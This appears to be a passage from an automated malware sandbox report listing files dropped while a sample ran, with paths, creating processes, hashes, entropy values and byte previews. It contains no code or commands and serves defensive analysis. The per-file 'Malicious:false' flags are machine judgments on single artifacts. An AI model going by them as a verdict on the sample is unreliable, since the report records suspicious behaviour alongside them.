                                                                                                                                                                  Preview:BMf.......6...(.......B..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035004, file counter 33, database pages 17, cookie 0x5, schema 4, UTF-8, version-valid-for 33
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):69632
                                                                                                                                                                  Entropy (8bit):4.360843876877082
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:eeEThwtEL38/GGN5ptmGQen3xx2ZszKhivC5vxwRv0ZsLRGV:hclGpBgZs/l0ZsLU
                                                                                                                                                                  MD5:EC260BE0B1D86E476B3F8725B9E7B5DC
                                                                                                                                                                  SHA1:4737C3080A91BC36F4B3952A2F09CA1F098C3CEE
                                                                                                                                                                  SHA-256:FB38C9341DA2372FE9E7C1BBF374ABB9F64D84E748039AC0E64D444C18F225FE
                                                                                                                                                                  SHA-512:0B1462A52C93DAFC71A3836F0CAF63973B492B3E1CBAF49005E38B35FB7C367D40AF8AE62396E3BAF4D77A1B6B1791693586AFAC537F033A488DB642FFA23A30
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ...!...................................................................!..O|......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                  Entropy (8bit):3.482219846983968
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:7MVOiol1xCol1sol1Q2iolV6iolsol1Nol1Aiol1fOiol1fEMol1C8ol1o5iol0A:7vXp6FQPKgfn9IVXEBodRBk+n
                                                                                                                                                                  MD5:83DE70A385A1408B82C0D2A2C39D2B2A
                                                                                                                                                                  SHA1:8B46D1481A2EAE072D873A499642496EC9616D34
                                                                                                                                                                  SHA-256:2D4B0C2B56B2C7FDAA534DB4A57307423C9B083498EAA442205BB2DF169346A1
                                                                                                                                                                  SHA-512:BE95429A30B81777969C1B9B2D491333624B70BCA0496B4863F024D66485009AA39D126FFFAF8FF637E19586C8A0199DBAA578CFFAA8439A606EB6DB188D1345
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.... .c.....t.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................y...g..m...../.g.......~...r......................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt21.lst (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):536
                                                                                                                                                                  Entropy (8bit):5.168073062267472
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:T4RFe6h8idRuMgxg6dxs3yBFTtDcZQRAzidRuOPgxg601s3yBFDHpcZQM:kFqid8HxPs3yTTtsnid8OPgx4s3yTDHo
                                                                                                                                                                  MD5:6F787FAC5E735DBEE521DCD8D3C8E858
                                                                                                                                                                  SHA1:1A171673DEF7919C9B2427310DCC87BBD89AA007
                                                                                                                                                                  SHA-256:A1E5CDB84F1B343BBCFBF213C3817E50AA9795D2863CEA841BE130CB7C5FD4C7
                                                                                                                                                                  SHA-512:F767B15B364EAE7D822D8D71FB9ADB6AF1400F79AC701035AFD846E0E4D468178FE0E0C76351A88BF6CB678AAD757B47C3CB4A4E82CB7DF706AA9B02F9407755
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:%!Adobe-FontList 1.22.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt22.lst.4348

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):536
                                                                                                                                                                  Entropy (8bit):5.168073062267472
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:T4RFe6h8idRuMgxg6dxs3yBFTtDcZQRAzidRuOPgxg601s3yBFDHpcZQM:kFqid8HxPs3yTTtsnid8OPgx4s3yTDHo
                                                                                                                                                                  MD5:6F787FAC5E735DBEE521DCD8D3C8E858
                                                                                                                                                                  SHA1:1A171673DEF7919C9B2427310DCC87BBD89AA007
                                                                                                                                                                  SHA-256:A1E5CDB84F1B343BBCFBF213C3817E50AA9795D2863CEA841BE130CB7C5FD4C7
                                                                                                                                                                  SHA-512:F767B15B364EAE7D822D8D71FB9ADB6AF1400F79AC701035AFD846E0E4D468178FE0E0C76351A88BF6CB678AAD757B47C3CB4A4E82CB7DF706AA9B02F9407755
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:%!Adobe-FontList 1.22.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt21.lst (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):536
                                                                                                                                                                  Entropy (8bit):5.168073062267472
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:T4RFe6h8idRuMgxg6dxs3yBFTtDcZQRAzidRuOPgxg601s3yBFDHpcZQM:kFqid8HxPs3yTTtsnid8OPgx4s3yTDHo
                                                                                                                                                                  MD5:6F787FAC5E735DBEE521DCD8D3C8E858
                                                                                                                                                                  SHA1:1A171673DEF7919C9B2427310DCC87BBD89AA007
                                                                                                                                                                  SHA-256:A1E5CDB84F1B343BBCFBF213C3817E50AA9795D2863CEA841BE130CB7C5FD4C7
                                                                                                                                                                  SHA-512:F767B15B364EAE7D822D8D71FB9ADB6AF1400F79AC701035AFD846E0E4D468178FE0E0C76351A88BF6CB678AAD757B47C3CB4A4E82CB7DF706AA9B02F9407755
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:%!Adobe-FontList 1.22.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt21.lst (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10254
                                                                                                                                                                  Entropy (8bit):5.219521007487608
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:rfA2L6Bw6FM76bMx6yU6Hy6Xk6PF6gV6ZQfs6wItRZ6mKtsu68ttG167e/btX458:rYEewSGsmdU4yKkCFFVgQfsfItRZtKt+
                                                                                                                                                                  MD5:4BA170A42160C86108475DB3EBD41455
                                                                                                                                                                  SHA1:A2274994767970A215A75F862B7F1EAC67ABABB6
                                                                                                                                                                  SHA-256:E9AADA55671902B91B000E520F7C9A250A817D10F56DAD113A9B14EB1F38FF4A
                                                                                                                                                                  SHA-512:416230BDC34F657425FE574074410A02BD1AD2C9F8F9BBC200A4996DCF469FA5389D43F204AFE8B222A119234D442FEF88E3F87BF23DECFB48A69382B240B338
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:%!Adobe-FontList 1.22.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.hasSVG:no.VariableFontType:NonVariableFont.FileLength:85552.FileModTime:1627105154.WeightClass:400.WidthClass:5.AngleClass:0.Des

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt22.lst.4348

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:PostScript document text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10254
                                                                                                                                                                  Entropy (8bit):5.219521007487608
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:rfA2L6Bw6FM76bMx6yU6Hy6Xk6PF6gV6ZQfs6wItRZ6mKtsu68ttG167e/btX458:rYEewSGsmdU4yKkCFFVgQfsfItRZtKt+
                                                                                                                                                                  MD5:4BA170A42160C86108475DB3EBD41455
                                                                                                                                                                  SHA1:A2274994767970A215A75F862B7F1EAC67ABABB6
                                                                                                                                                                  SHA-256:E9AADA55671902B91B000E520F7C9A250A817D10F56DAD113A9B14EB1F38FF4A
                                                                                                                                                                  SHA-512:416230BDC34F657425FE574074410A02BD1AD2C9F8F9BBC200A4996DCF469FA5389D43F204AFE8B222A119234D442FEF88E3F87BF23DECFB48A69382B240B338
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:%!Adobe-FontList 1.22.%Locale:0x409..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1426548852.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:Type1.FontName:AdobePiStd.FamilyName:Adobe Pi Std.StyleName:Regular.FullName:Adobe Pi Std.MenuName:Adobe Pi Std.StyleBits:0.WritingScript:Roman.OutlineFileName:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\AdobePiStd.otf.DataFormat:sfntData.UsesStandardEncoding:yes.isCFF:yes.hasSVG:no.VariableFontType:NonVariableFont.FileLength:85552.FileModTime:1627105154.WeightClass:400.WidthClass:5.AngleClass:0.Des

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\Files\TESTING

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):4
                                                                                                                                                                  Entropy (8bit):0.8112781244591328
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:e:e
                                                                                                                                                                  MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                                                                  SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                                                                  SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                                                                  SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:....

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Reader\SOPHIA.json

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):945
                                                                                                                                                                  Entropy (8bit):5.067504315600724
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:YFqxBoA22502+Otv22E3CyMCV+t8oxwZKg2Ak36SK/0igly8jkE5ksoJSnONs:YFur2NO2LSZCgq+/URAjzROG
                                                                                                                                                                  MD5:3513A336F8435927A37683851AB63574
                                                                                                                                                                  SHA1:5890A3645323CB5C228AECA1EC3EF90D372D9A6E
                                                                                                                                                                  SHA-256:98889E11648AB36ADC4057A5294A343E180C0619B8B4462DEC56F25E7716E89F
                                                                                                                                                                  SHA-512:D278B57073AD97F68314E60484BDC867D8CDE0DD43155CF11DECC43385444D706F52F4AD9D1B29514D7D4F15BC7BF5FAD877C913DA6AC1FFE8A492C5FF2C6541
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"all":[{"id":"TESTING","info":{"dg":"DG","sid":"TESTING"},"mimeType":"file","size":4,"ts":1736578423000},{"id":"DC_FirstMile_Right_Sec_Surface","info":{"dg":"0353a8d4cbb1fc6eab3151e24b9d1c03","sid":"DC_FirstMile_Right_Sec_Surface"},"mimeType":"file","size":294,"ts":1725958090000},{"id":"Edit_InApp_Aug2020","info":{"dg":"6c845701913dc07a142631007125304a","sid":"Edit_InApp_Aug2020"},"mimeType":"file","size":782,"ts":1725958090000},{"id":"DC_Reader_RHP_Banner","info":{"dg":"9a041f338931f9aaad7d5f13d6917eef","sid":"DC_Reader_RHP_Banner"},"mimeType":"file","size":1395,"ts":1725958090000},{"id":"DC_Reader_Upsell_Cards","info":{"dg":"e4e8b9846fec296de87fec860fc692f8","sid":"DC_Reader_Upsell_Cards"},"mimeType":"file","size":286,"ts":1725958090000},{"id":"DC_Reader_RHP_Retention","info":{"dg":"ac64b04ece130274a3be222dc51bdd30","sid":"DC_Reader_RHP_Retention"},"mimeType":"file","size":287,"ts":1725958090000}],"g_info":{"Version":"0.0.0.1"}}

                                                                                                                                                                  C:\Users\user\AppData\Local\Adobe\Acrobat\DC\UserCache.bin

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):40393
                                                                                                                                                                  Entropy (8bit):5.518083145564749
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:K7X4oyVFMqHBMvN2yUjySlR3k6Vhx8VzgJWJYNg7y:KT4oyVFMwBCNhSlR3k6XKBYyu
                                                                                                                                                                  MD5:E7BF64B5A03EC2F1AD86858FF02DE8FA
                                                                                                                                                                  SHA1:00150174D7D8392FEC730321B5C62AB5D3D2BAC6
                                                                                                                                                                  SHA-256:E7893EE167595C56F65A6B9C77135F74E7DEFDA9388B058710AB48CDBF578AE4
                                                                                                                                                                  SHA-512:28A4F23121887F51079F4B1905D978F49FDB8C009F761171D19487B59641A0158DB75036C1A35D7A1C7DC6672D963D8052B505321CEFB9692E28A0110AB5F16C
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:4.241.93.FID.2:o:........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.107.FID.2:o:........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.103.FID.2:o:........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.116.FID.2:o:........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.75.FID.2:o:........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.89.FID.2:o:........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.85.FID.2:o:........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.98.FID.2:o:........:F:Arial-BoldItalicMT.P:Arial Bold Italic.L:$.........................."F:Arial.#.91.FID.2:o:........:F:Arial-Black.P:Arial Black.L:-.........................."F:Arial Black.#.103.FID.2:o:........:F:Bahnschrift.P:Bahnschrift Light.L:&...............,.........."F:Bahnschrift Light.#.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):1824
                                                                                                                                                                  Entropy (8bit):5.207902729616354
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:48:uPJSGfs4c4RQmFoUefamfgZ9tK8NfJAoc+jIrW6LH:yIGHcIFKLfbIZ2Kfc+jAWQH
                                                                                                                                                                  MD5:465E8E23DF666A077E10854861FDC103
                                                                                                                                                                  SHA1:D75B120D79F369F508834ECEC66A06F228B40A2D
                                                                                                                                                                  SHA-256:1D3A30C6E1C9103EEFC4EBD1B307341281144CA872B1B61B8839B5EBB4A0A011
                                                                                                                                                                  SHA-512:5C8DAC6CA831CE5F00C144C7BAB699D0BA87C78F43E9EF1780A6D89EBEBD43E19D82429CEC01CB8171A91FE73E507731862D14274B3FFD35572D5AFB226A4B07
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:@...e...........................................................T...............n$....<@.{..uR.......*.Microsoft.Management.Infrastructure.Native..H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0...............I.....B..ZR............System..4......................A....E..........System.Core.D................g$H..K..I.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4..................%`99B....9...........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\$inst\2.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\Yv24LkKBY6.exe
                                                                                                                                                                  File Type:Microsoft Cabinet archive data, 36 bytes, at 0x24 "", number 1, 0 datablock, 0 compression
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):36
                                                                                                                                                                  Entropy (8bit):1.3753156176197312
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:wDl:wDl
                                                                                                                                                                  MD5:8708699D2C73BED30A0A08D80F96D6D7
                                                                                                                                                                  SHA1:684CB9D317146553E8C5269C8AFB1539565F4F78
                                                                                                                                                                  SHA-256:A32E0A83001D2C5D41649063217923DAC167809CAB50EC5784078E41C9EC0F0F
                                                                                                                                                                  SHA-512:38ECE3E441CC5D8E97781801D5B19BDEDE6065A0A50F7F87337039EDEEB4A22AD0348E9F5B5542B26236037DD35D0563F62D7F4C4F991C51020552CFAE03B264
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MSCF....$.......$...................

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\$inst\temp_0.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\Yv24LkKBY6.exe
                                                                                                                                                                  File Type:Microsoft Cabinet archive data, many, 713528 bytes, 3 files, at 0x2c +A "0" +A "1", number 1, 56 datablocks, 0x1503 compression
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):713528
                                                                                                                                                                  Entropy (8bit):7.999592053370537
                                                                                                                                                                  Encrypted:true
                                                                                                                                                                  SSDEEP:12288:gbD1JtgNuVSIUa6xbajCPNNIbIV8DSGAF/2K2+21Br9eGmfnfWjgsTo0+DuKriE:glJSuoBa6xGuPAIV8D/6kN1betf2Zo04
                                                                                                                                                                  MD5:7012E21E7EA2A7E8C11BF15235428710
                                                                                                                                                                  SHA1:AADE81FD733C081FD79D8CA849C0DE37407AEE37
                                                                                                                                                                  SHA-256:FE880D56A2B9CBD0A279375921590BA1F53292CD8723DD601E225DF77BC51696
                                                                                                                                                                  SHA-512:8EF3DA74B59C4D6A7985179C348448B81DEEEF2448B71B4D04254FDEBE1007AE8316B0BD8B2A6EDDB7D2125CDC0C9E86C53C769F0C056C44876C7694E438A2CB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MSCF....8.......,...................b...8...Jd........MY.V .0..\..Jd....8Y.. .1.....J.....TY.: .2.Q.E.$f..[...............%.1.3.f`.C..........6T.5j5T6T........d..f.......R.8..Ix.xn..2@&@....6..1..o..0.._.....1......c..D.{Y1L$.,...'.B../........3..D@...Y...j.[.D..V....'.9N.w....c..9QPx>..EQ..X.H..Q.BQ[S..G..u..f..o..$._?.T|,.....Z4_Z.....i.h..#.Tf.eL@.+,L..4.|...."..K.......B..N.i~[<f^...k.+....f../..}C.D_..c..`fV.E.E..*.g{C.Z..)&v....a~"I.J......)..&......9Y....1....R.....t....=.6.x.+....3...;..hK.C.#5m1.B'.R4....M.3...EGT........^K.@u.#I..;I..Mn..;~c..._..V....8xTL..K.S.......B.o....5h.8z.=..?PTY.....W..!.n......ot.7{..E.L.X.n:z.2X.p.....)F...^.......9....=>q.[o.8fV..coHQ].E..a.q>.r.+...P....M..O....)..y.....1.=......1..>-.+z....n#m..N..N..).=...`..!...%..7z......mx...\Cnw.b..%...>..p.+....<.S...............<.v.6q.......z.,i..u`.G.n.....^...........?Nz.i.k...,.....W.#.....{.|...q.Q{?.....3%..Sa..q<..P1v.%n..ST{../OG.C.|J.8k.M.h7.'

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uowp4dj.l31.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ck41cmq3.kwx.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pp3kkwli.c2s.ps1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvpwynpt.lpj.psm1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):60
                                                                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\autACE4.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Intel\dc.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):33220
                                                                                                                                                                  Entropy (8bit):7.730918275075489
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:ucjZIYG6A8kiHIgH82NNkIY6zAXohupeNISgTBuda:ul8kpg9NW6vhupUISgoda
                                                                                                                                                                  MD5:7F08F61D0CB3BDEF38867217FD81B787
